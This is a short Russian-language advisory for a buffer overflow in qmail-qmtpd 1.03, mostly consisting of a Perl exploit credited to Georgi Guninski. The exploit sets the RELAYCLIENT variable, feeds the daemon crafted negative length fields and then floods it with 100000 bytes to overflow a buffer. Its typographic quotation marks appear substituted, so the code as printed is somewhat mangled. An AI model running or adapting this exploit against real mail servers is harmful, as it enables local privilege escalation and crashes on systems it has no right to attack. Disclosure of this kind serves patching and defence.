Программа: Qmail-qmtpd 1.03 

Переполнение буфера обнаружено в qmail-qmtpd. Локальный пользователь может получить поднятые привилегии.
Локальный пользователь может установить RELAYCLIENT переменную окружения к специально сформированному значению, чтобы вызвать переполнение буфера. 

Эксплоит: 

#!/usr/bin/perl -w

#Copyright Georgi Guninski\nCannot be used in vulnerability databases and
#similar stuff

use IO::Socket;
use IO::Poll;

$ENV{«RELAYCLIENT»}=»M\$UX»;
open(SOCK,»|/var/qmail/bin/qmail-qmtpd»);

my $req;
my $fromaddr=»they\@m\$.weenies»;
my $touser=»postmaster»;

print «qmail-qmtpd buffer overflow. Copyright Georgi Guninski\nCannot be
used in vulnerability d
atabases and similar stuff\n»;

$req = «1:\n,»;
$req .= «1:V,»;
$req .= «/:»; #biglen — this is how we code ‘-1’
$req .= «,:»; #len — this is how we code ‘-4’

print SOCK $req;
my $ch=getc();

$req = «v» x 100000;

print SOCK $req;
close SOCK;

Оставить мнение